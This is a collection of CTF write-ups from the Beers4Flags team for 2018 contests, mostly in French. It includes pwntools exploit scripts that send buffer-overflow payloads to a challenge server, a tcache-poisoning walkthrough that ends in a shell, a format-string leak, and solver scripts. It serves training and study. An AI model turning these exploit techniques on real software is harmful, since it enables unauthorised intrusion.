c3 * c15 / c17 - 1) 62 | solver.add(c10 == c1) 63 | solver.add(c13 == c10 + 5) 64 | solver.add(c10 == c5 - 9) 65 | solver.add(c0 % c7 * c11 == 1440) 66 | solver.add(c2 - c8 + c12 == c10 - 9) 67 | solver.add((c3 + c12) / 2 == c16) 68 | solver.add(c0 - c2 + c3 == c12 + 15) 69 | solver.add(c3 == c13) 70 | solver.add(c16 == c0) 71 | solver.add(c7 + 1 == c2) 72 | solver.add(c15 + 1 == c11) 73 | solver.add(c11 + 3 == c17) 74 | solver.add(c7 + 20 == c6) 75 | 76 | # Check() returns true if there is a solution 77 | # and model() the values of characters. 78 | if solver.check(): 79 | print(solver.model()) 80 | else: 81 | print('Not found.') 82 | -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a761.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a761.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a7c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-a7c.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-modif-stack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-modif-stack.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-sub-874.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-function-sub-874.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-functions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-functions.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-main-decomp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-main-decomp.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-positive-sp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-positive-sp.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-stack-761.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-stack-761.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/img/cls-verify-hardcoded-flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Reverse/250-call_less_reverse/img/cls-verify-hardcoded-flag.png -------------------------------------------------------------------------------- /2018/Thcon/Reverse/250-call_less_reverse/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import os 5 | import array 6 | 7 | def reverse_processing(byte): 8 | res = byte | 0x80 9 | res = res ^ 0xCA 10 | res = res + 66 11 | res = res ^ 0xCA 12 | res = res + 66 13 | res = res ^ 0xCA 14 | res = res + 66 15 | res = res ^ 0xFE 16 | 17 | return res 18 | 19 | expected = open('expected.bin', 'rb').read() 20 | flag = [] 21 | for i, e in enumerate(expected): 22 | for i in range(ord(' '), ord('~')): 23 | res = reverse_processing(i) 24 | if res & 0xff == e: 25 | flag.append(chr(i)) 26 | break 27 | 28 | # Reverse characters 29 | flag = array.array('u', flag) 30 | for i in range(0, len(flag)//2): 31 | tmp = flag[i] 32 | flag[i] = flag[len(flag)-i-1] 33 | flag[len(flag)-i-1] = tmp 34 | 35 | print('flag: ' + ''.join(flag)) 36 | -------------------------------------------------------------------------------- /2018/Thcon/Web/200/sources/sources.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Web/200/sources/sources.zip -------------------------------------------------------------------------------- /2018/Thcon/Web/300/img/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Thcon/Web/300/img/flag.png -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Attendance/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename attendance 12 | File format ELF32 13 | Architecture x86 14 | Endianess little endian 15 | Entry point 0x8048560 16 | Loadables segments 2 17 | Sections 32 18 | 19 | NX bit enabled 20 | SSP disabled 21 | Relro partial 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE disabled 25 | ``` 26 | Simple buffer overflow. Voir payload.py 27 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Attendance/attendance: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Attendance/attendance -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Attendance/payload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | from pwn import * 4 | import time 5 | import sys 6 | binaire='attendance' 7 | TIME=0.02 8 | if (len(sys.argv)>1): 9 | elf=ELF(binaire) 10 | # libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') 11 | host='localhost' 12 | port=59994 13 | else: 14 | elf=ELF(binaire) 15 | # libc=ELF('libc-chall.so.6') 16 | host='89.38.210.128' 17 | port=31337 18 | 19 | p=remote(host,port) 20 | 21 | def waitmenu(): 22 | return(p.recvuntil("Call>")) 23 | 24 | p.sendline("31337") 25 | 26 | ''' 27 | ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM 28 | Principal got your message ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQR 29 | 30 | Program received signal SIGSEGV, Segmentation fault. 31 | --------------------------------------------------------------------------[regs] 32 | EAX: 0x0000005b EBX: 0x48484747 ECX: 0xffffaa70 EDX: 0xf7f9c870 o d I t S z a p c 33 | ESI: 0x44444343 EDI: 0x46464545 EBP: 0x4a4a4949 ESP: 0xffffcff0 EIP: 0x4c4c4b4b 34 | CS: 0023 DS: 002b ES: 002b FS: 0000 GS: 0063 SS: 002bError while running hook_stop: 35 | Cannot access memory at address 0x4c4c4b4b 36 | 0x4c4c4b4b in ?? () 37 | (gdb) RSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM 38 | Undefined command: "RSSTTUUVVWWXXYYZZ". Try "help". 39 | (gdb) 40 | ''' 41 | p.sendline("ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJ"+p32(elf.sym['bring_students_to_school'])) 42 | 43 | p.interactive() 44 | 45 | 46 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Cdparty/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename c_party 12 | File format ELF32 13 | Architecture x86 14 | Endianess little endian 15 | Entry point 0x8048700 16 | Loadables segments 2 17 | Sections 30 18 | 19 | NX bit enabled 20 | SSP disabled 21 | Relro partial 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE disabled 25 | ``` 26 | Là encore, un buffer overflow permet d'aller au bon endroit dans le programme. -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Cdparty/c_party: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Cdparty/c_party -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Cdparty/c_party.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Cdparty/c_party.zip -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Cdparty/payload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | from pwn import * 4 | import time 5 | import sys 6 | binaire='c_party' 7 | TIME=0.02 8 | if (len(sys.argv)>1): 9 | elf=ELF(binaire) 10 | # libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') 11 | host='localhost' 12 | port=59994 13 | else: 14 | elf=ELF(binaire) 15 | # libc=ELF('libc-chall.so.6') 16 | host='89.38.210.128' 17 | port=31338 18 | 19 | 20 | p=remote(host,port) 21 | 22 | def waitmenu(): 23 | return(p.recvuntil("Password:")) 24 | 25 | 26 | ''' 27 | ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM 28 | Principal got your message ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQR 29 | 30 | Program received signal SIGSEGV, Segmentation fault. 31 | --------------------------------------------------------------------------[regs] 32 | EAX: 0x0000005b EBX: 0x48484747 ECX: 0xffffaa70 EDX: 0xf7f9c870 o d I t S z a p c 33 | ESI: 0x44444343 EDI: 0x46464545 EBP: 0x4a4a4949 ESP: 0xffffcff0 EIP: 0x4c4c4b4b 34 | CS: 0023 DS: 002b ES: 002b FS: 0000 GS: 0063 SS: 002bError while running hook_stop: 35 | Cannot access memory at address 0x4c4c4b4b 36 | 0x4c4c4b4b in ?? () 37 | (gdb) RSSTTUUVVWWXXYYZZ@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLM 38 | Undefined command: "RSSTTUUVVWWXXYYZZ". Try "help". 39 | (gdb) 40 | ''' 41 | pause() 42 | p.sendline("ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHIIJJKKLL"+p32(0x804a210)+p32(0x8048afb)) 43 | 44 | print p.recvall(2) 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/HeapSchool/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename heaphop 12 | File format ELF64 13 | Architecture x86-64 14 | Endianess little endian 15 | Entry point 0x400780 16 | Loadables segments 3 17 | Sections 28 18 | 19 | NX bit enabled 20 | SSP enabled 21 | Relro partial 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE disabled 25 | ``` 26 | La méthode utlisée est celle de la corruption du tcache vue que la libc 27 | est une 2.26 avec donc un cache. On utilise pour ça l'uaf possible puisque le 28 | pointeur est disponible après la libération du bloc. 29 | On alloue un bloc, on le libère, on écrit au début du bloc l'adresse de la got 30 | de la fonction free, on alloue un bloc (le cache est empoisonné) on réalloue 31 | un bloc qui pointe vers la got d'free. On lit cette adresse ce qui donne 32 | l'adresse de la libc. On la remplace par celle de system. On alloue enfin 33 | un bloc dans lequel on écrit /bin/sh et on libère ce bloc. On obtient un 34 | sehll. -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/HeapSchool/heaphop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/HeapSchool/heaphop -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Letssort/letssort: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Letssort/letssort -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Letssort/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Letssort/libc.so.6 -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename memo 12 | File format ELF64 13 | Architecture x86-64 14 | Endianess little endian 15 | Entry point 0x400a00 16 | Loadables segments 2 17 | Sections 29 18 | 19 | NX bit enabled 20 | SSP disabled 21 | Relro partial 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE disabled 25 | ``` 26 | 27 | Le programme présent eune faille format dans l'affichage du nom à la fin de la 28 | partie. Or le flag est lu à un moment en mémoire au début de main. 29 | Un affichage de toutes les chaines pointées par les mots sur la pile donne le 30 | résultat: 31 | 32 | francois@aramis:~/BFF/Timisoara/Memo$ python payload.py SILENT 33 | You have a very good memory n? 34 | 35 | H=���s1�H\x83�\xfe� 36 | 37 | g5d\xb4\x7f 38 | Let's play 39 | Your name? > 40 | (null) 41 | (null) 42 | \xa0\x8c\h 43 | (null) 44 | (null) 45 | (null) 46 | UH\x89�H�� H\xbf%\x13@ 47 | UH\x89�H�� H\xbf%\x13@ 48 | UH\x89�H�� H\xbf%\x13@ 49 | 1�I��^H\x89�H���PTI���@ 50 | timctf{t0_4rr1ve_4t_th3_s1mple_is_d1ff1cult} 51 | (null) 52 | AWAVA\x89\xffAUATL\x8d%\x86\x0c 53 | \x89���� 54 | @\x8f\x80=� 55 | UH\x89�H�� 56 | (null) 57 | 1�I��^H\x89�H���PTI���@ 58 |  59 | (null) 60 | (null) 61 | (null) 62 | (null) 63 | (null) 64 | Eo�%� 65 | 66 | �\x1f 67 | (null) 68 | (null) 69 | 1�I��^H\x89�H���PTI���@ 70 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo.exe -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/memo.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Memo/memo.zip -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/pile: -------------------------------------------------------------------------------- 1 | 7f848e59d780 7f848e2ce2c0 2 | 7ffc62301701 1c1fc37b45 3 | 401256 d00000000 4 | 0 6f 5 | 3 7ffe6b798e30 6 | 78 0 7 | 401020 400aa0 8 | 401160 7fc4ef4ee830 9 | 1d4152ca0 400ba0 10 | 400aa0 7fff4c8ddf90 11 | c014f825d7123206 c176528f3f223206 12 | 0 7ffda2147498 13 | 0 0 14 | 0 400aca 15 | 1 7fffef1ebf40 16 | 7ffc1c3a7f57 7ffc1c3a7f99 17 | 7ffcc80ecfce 0 18 | 10 1f8bfbff 19 | 11 64 20 | 4 38 21 | 7 7f699d95b000 22 | 9 400aa0 23 | c 3ed 24 | e 3ed 25 | 19 7ffcb6339989 26 | f 7ffe54b59069 27 | 0 7e6188685db20500 28 | 0 0 29 | 0 0 30 | 0 0 31 | 0 0 32 | 0 0 33 | 622f6c61636f6c2f 2f7273752f3a6e69 34 | 0 0 35 | 0 0 36 | 0 0 37 | 0 0 38 | 0 0 39 | 0 0 40 | 0 0 41 | 0 0 42 | 0 0 43 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Memo/pilelocaleSansASLR: -------------------------------------------------------------------------------- 1 | démarre à 2 2 | 7fef20aec760 7fef2082c760 3 | 0 1c00000000 4 | 401123 d00000000 5 | 400b0000000000 6f 6 | 3 7ffc53afedef 7 | 78 0 8 | 400f10 400a00 9 | 401050 7f9e622582b1 10 | 1badd12e8 400b00 11 | 400a00 7ffce6631a50 12 | 138a5357df73205a 12593ef23ba1205a 13 | 0 7ffe8e8c3fc8 14 | 0 0 15 | 0 400a2a 16 | 1 7ffd20822301 17 | 7fff7fce6334 7fff7fce6342 18 | 7fffeb9ba379 7fffeb9ba381 19 | 7ffcbc9c83ea 7ffcbc9c844c 20 | 7ffef412848a 7ffef412849c 21 | 7ffe8e5744da 7ffe8e5745c1 22 | 7ffd46f6572b 7ffd46f65741 23 | 7ffea76137a7 7ffea76137b7 24 | 7fff2a110db1 7fff2a110dd7 25 | 7ffef4cc7e4f 7ffef4cc7e5f 26 | 7ffee7f4eede 7ffee7f4ef10 27 | 7ffdfa408f8c 7ffdfa408fd4 28 | 7ffce7ad6000 10 29 | 1000 11 30 | 400040 4 31 | 9 7 32 | 0 9 33 | 3e8 c 34 | 3e8 e 35 | 0 19 36 | 7ffc28043fed f 37 | 0 fa69a5348b100f00 38 | 0 0 39 | 0 0 40 | 0 0 41 | 0 0 42 | 0 0 43 | 0 0 44 | 0 0 45 | 0 0 46 | 0 0 47 | 0 0 48 | 0 0 49 | 0 0 50 | 0 0 51 | 0 0 52 | 0 0 53 | 0 0 54 | 0 0 55 | 0 0 56 | 0 0 57 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | ``` 10 | ===== INFOS ===== 11 | Filename pwnescu 12 | File format ELF64 13 | Architecture x86-64 14 | Endianess little endian 15 | Entry point 0x9f0 16 | Loadables segments 2 17 | Sections 29 18 | 19 | NX bit enabled 20 | SSP enabled 21 | Relro partial 22 | RPATH no rpath 23 | RUNPATH no runpath 24 | PIE enabled 25 | ``` 26 | La fonction chance se présente comme suit: 27 | 28 | void chance(char *p){ 29 | char buf[4096]; 30 | int readcount = read(0, buf, 4095); 31 | if (readcount < 10) { 32 | puts("Come on.... seriously?"); 33 | exit(-1); 34 | } 35 | validate(buf, readcount); 36 | 37 | if (memcmp(buf, p, 100) == 0 ){ 38 | puts("You win!"); 39 | system("cat /home/`whoami`/flag"); 40 | exit(0); 41 | } else { 42 | puts("Guess again!"); 43 | } 44 | } 45 | 46 | 47 | Donc on peut se contenter de lui passer une chaine de 11 caractères. 48 | Seule cette chaine est testée pour les majuscules. Or d'une part le programme 49 | ne met pas de 0 final à la fin, d'autre part, en mémoire subsite sur la pile 50 | au même endroit où est enregistré le hash calculé le hash obtenu par le 51 | programme. 52 | 53 | Il suffit donc de récupérer le seed donné par le programme au début, de calculer 54 | les différents hash et d'envoyer les 11 premiers caractères (sans linefeed 55 | derrière). À un moment il n'y aura pas de majuscule dans ces caractères et on 56 | passera le test. 57 | 58 | 59 | Bizarrement, ça ne marche pas à tous les coups mais bon... 60 | 61 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 62 | 63 | You win! 64 | timctf{a64447f8c8c8bc638ed56a9fdfd7d33c8c760359} 65 | 66 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 67 | 68 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/payload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # encoding: utf-8 4 | from pwn import * 5 | import time 6 | import sys 7 | import os 8 | #binaire='heaphop' 9 | TIME=0.02 10 | if (len(sys.argv)>1): 11 | # elf=ELF(binaire) 12 | # libc=ELF('libc.so.6') 13 | host='localhost' 14 | port=59994 15 | else: 16 | # elf=ELF(binaire) 17 | # libc=ELF('libc.so.6') 18 | host='89.38.210.128' 19 | port=1337 20 | 21 | p=remote(host,port) 22 | b=p.recvuntil("!\n") 23 | print b 24 | sseed=b[b.index("is ")+3:b.index("\n")] 25 | seed=int(sseed,16) 26 | print sseed 27 | os.system("./rand "+sseed+" > resultat") 28 | f=open("resultat","r") 29 | l=f.readline() 30 | print p.recvuntil("!\n") 31 | while(len(l)>0): 32 | print l 33 | p.send(l[0:11]) 34 | print p.recv("1024") 35 | l=f.readline() 36 | f.close() 37 | 38 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/pwnescu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Pwnescu/pwnescu -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/pwnescu.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void setup(){ 9 | int fd = open("/dev/urandom", O_RDONLY); 10 | long int seed; 11 | read(fd, &seed, sizeof(seed) ); 12 | srand(seed); 13 | printf("Today's magic number is %lx\n", seed); 14 | alarm(60); 15 | close(fd); 16 | 17 | setbuf(stdout, NULL); 18 | setbuf(stdin, NULL); 19 | 20 | } 21 | 22 | char *gen_rand_string(int len) 23 | { 24 | int i; 25 | char buf[4096]; 26 | char tab[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ "; 27 | for(i = 0 ; i < len; i ++){ 28 | char c = tab[rand() % (sizeof(tab)-1) ]; 29 | buf[i] = c; 30 | } 31 | buf[len] = 0; 32 | 33 | char *s = calloc(len+1, 1); 34 | memcpy(s, buf, len+1); 35 | return s; 36 | } 37 | 38 | void validate(char *buf, int sz){ 39 | int i; 40 | for(i = 0 ; i < sz; i++) 41 | if ( buf[i] >= 'A' && buf[i] <= 'Z') { 42 | puts("Come on.... seriously?"); 43 | exit(-1); 44 | } 45 | } 46 | 47 | void chance(char *p){ 48 | char buf[4096]; 49 | int readcount = read(0, buf, 4095); 50 | if (readcount < 10) { 51 | puts("Come on.... seriously?"); 52 | exit(-1); 53 | } 54 | validate(buf, readcount); 55 | 56 | if (memcmp(buf, p, 100) == 0 ){ 57 | puts("You win!"); 58 | system("cat /home/`whoami`/flag"); 59 | exit(0); 60 | } else { 61 | puts("Guess again!"); 62 | } 63 | } 64 | 65 | 66 | int main() 67 | { 68 | setup(); 69 | puts("Let's play a game!"); 70 | puts("We recently heard that China wants to ban the letter N. Why not all uppercase?"); 71 | puts("Let's not make it super hard, though: you have 100 tries. Do you know your maths and probabilities?"); 72 | puts("Use the magic number above and give me the password. But no uppercase please!"); 73 | 74 | int i; 75 | for(i = 0 ; i < 100; i++){ 76 | char *p = gen_rand_string(100); 77 | chance(p); 78 | free(p); 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/rand: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Pwnescu/rand -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/Pwnescu/rand.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | 10 | char *gen_rand_string(int len) 11 | { 12 | int i; 13 | char buf[4096]; 14 | char tab[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ "; 15 | for(i = 0 ; i < len; i ++){ 16 | char c = tab[rand() % (sizeof(tab)-1) ]; 17 | buf[i] = c; 18 | } 19 | buf[len] = 0; 20 | 21 | char *s = calloc(len+1, 1); 22 | memcpy(s, buf, len+1); 23 | return s; 24 | } 25 | 26 | int validate(char *buf, int sz){ 27 | int i; 28 | for(i = 0 ; i < sz; i++) 29 | if ( buf[i] >= 'A' && buf[i] <= 'Z') return(0); 30 | return(1); 31 | } 32 | 33 | 34 | 35 | int main(int argc,char **argv) 36 | { 37 | 38 | long int seed; 39 | int i; 40 | seed=strtol(argv[1],NULL,16); 41 | srand(seed); 42 | for(i = 0 ; i < 100; i++){ 43 | char *p = gen_rand_string(100); 44 | if (validate(p,10)) 45 | printf("%s\n",p); 46 | else 47 | printf("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n"); 48 | free(p); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /2018/Timisoara/Pwn/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: "Timisoara 4 | date: 20 Avril 2018 5 | comments: true 6 | categories: wu 7 | auteur: françois 8 | --- 9 | 10 | writeups des 6 pwns suivants: 11 | 12 | Attendance Cdparty HeapSchool Letssort Memo Pwnescu -------------------------------------------------------------------------------- /2018/Timisoara/forensic/neurosurgery/files/Ubuntu1604_4.4.0-116.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/forensic/neurosurgery/files/Ubuntu1604_4.4.0-116.zip -------------------------------------------------------------------------------- /2018/Timisoara/forensic/neurosurgery/files/ht0p: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/forensic/neurosurgery/files/ht0p -------------------------------------------------------------------------------- /2018/Timisoara/web/porcupiney/README.md: -------------------------------------------------------------------------------- 1 | # CTF - 2018 - Timisoara CTF 2018 Quals / Web / porcupiney 2 | 3 | ## web - 50 pts - SSL certificate 4 | 5 | - We got an html website with nothing interresting. 6 | 7 | - When we look at alternative name of the certificate, we find an hidden one 8 | ``` 9 | true | openssl s_client -connect porcupiney.woodlandhighschool.xyz:443 | openssl x509 -noout -text | grep DNS 10 | depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3 11 | verify return:1 12 | depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3 13 | verify return:1 14 | depth=0 CN = porcupiney.woodlandhighschool.xyz 15 | verify return:1 16 | DONE 17 | DNS:nonononono.woodlandhighschool.xyz, DNS:porcupiney.woodlandhighschool.xyz 18 | ``` 19 | 20 | - When we navigate to it, the flag is in the page : 21 | ``` 22 | curl -s https://nonononono.woodlandhighschool.xyz | grep timctf 23 |

Look away! Shush! I give you flag, you shush, ok? timctf{w00dl4nd_cr1tt3rs_s3cur3_chr1stm4s}

24 | ``` 25 | 26 | - Demo here : [![asciicast](https://asciinema.org/a/PC9bywxGJb1gYi4JtItgLIXy0.png)](https://asciinema.org/a/PC9bywxGJb1gYi4JtItgLIXy0?speed=2) 27 | 28 | By team Beers4Flags 29 | 30 | ``` 31 | ________ 32 | | | 33 | | #BFF | 34 | |________| 35 | _.._,_|,_ 36 | ( | ) 37 | ]~,"-.-~~[ 38 | .=] Beers ([ 39 | | ]) 4 ([ 40 | '=]) Flags [ 41 | |:: ' | 42 | ~~----~~ 43 | ``` 44 | -------------------------------------------------------------------------------- /2018/angstrom/README.md: -------------------------------------------------------------------------------- 1 | # Angstrom CTF 2018 WU 2 | -------------------------------------------------------------------------------- /2018/angstrom/crypto/ssh/files/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | ???????????????????????????????????????????????????????????????? 3 | ???????????????????????????????????????????????????????????????? 4 | ???????????????????????????????????????????????????????????????? 5 | ???????????????????????????????????????????????????????????????? 6 | ???????????????????????????????????????????????????????????????? 7 | ???????????????????????????????????????????????????????????????? 8 | ???????????????????????????????????????????????????????????????? 9 | ???????????????????????????????????????????????????????????????? 10 | ???????????????????????????????????????????????????????????????? 11 | ???????????????????????????????????????????????????????????????? 12 | ???????????????????????????????????????????????????????????????? 13 | ???????????????????????????????????????????????????????????????? 14 | ???????????????????????????????????????????????????????????????? 15 | YC2/ZTbmSZFL9t5Em+ic2ayw0nNUSI6XO7+3tcT9TABzh94t9YLhiDcCgYEA0LFZ 16 | OUTgvmnWAkwGSo/6huQOu/7VmsM7OBdFntgotOJXALXFqCeT2PMXyWVc9/6ObUZj 17 | z9LQUlT6mnzYwFrX4mPPOTY5nvCyjepQlSDA7w49yaRhXKCFRHmEieeFJqzrZoQG 18 | 